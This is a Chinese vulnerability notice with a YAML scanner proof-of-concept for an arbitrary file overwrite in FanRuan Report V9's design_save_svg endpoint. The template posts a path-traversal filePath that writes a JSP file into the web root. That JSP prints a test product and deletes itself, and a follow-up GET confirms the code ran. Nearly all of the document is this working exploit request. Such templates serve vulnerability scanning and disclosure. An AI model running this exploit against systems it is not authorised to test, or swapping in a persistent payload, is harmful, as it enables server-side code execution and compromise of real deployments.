漏洞描述
帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传
fanruan-oa-v9-designsavevg-upload-file: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传
PoC代码[已公开]
id: fanruan-oa-v9-designsavevg-upload-file
info:
name: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传
author: zan8in
severity: critical
description: |
帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传
reference:
- http://wiki.peiqi.tech/wiki/oa/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20V9%20design_save_svg%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E7%9B%96%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html
set:
rand1: randomLowercase(12)
r2: randomInt(100,999)
r3: randomInt(100,999)
rules:
r0:
request:
method: POST
path: /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp
headers:
Content-Type: text/xml;charset=UTF-8
body: |
{"__CONTENT__":"<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>","__CHARSET__":"UTF-8"}
expression: response.status == 200
r1:
request:
method: GET
path: /WebReport/update.jsp
expression: response.status == 200 && response.body.bcontains(bytes(string(r2*r3)))
expression: r0() && r1()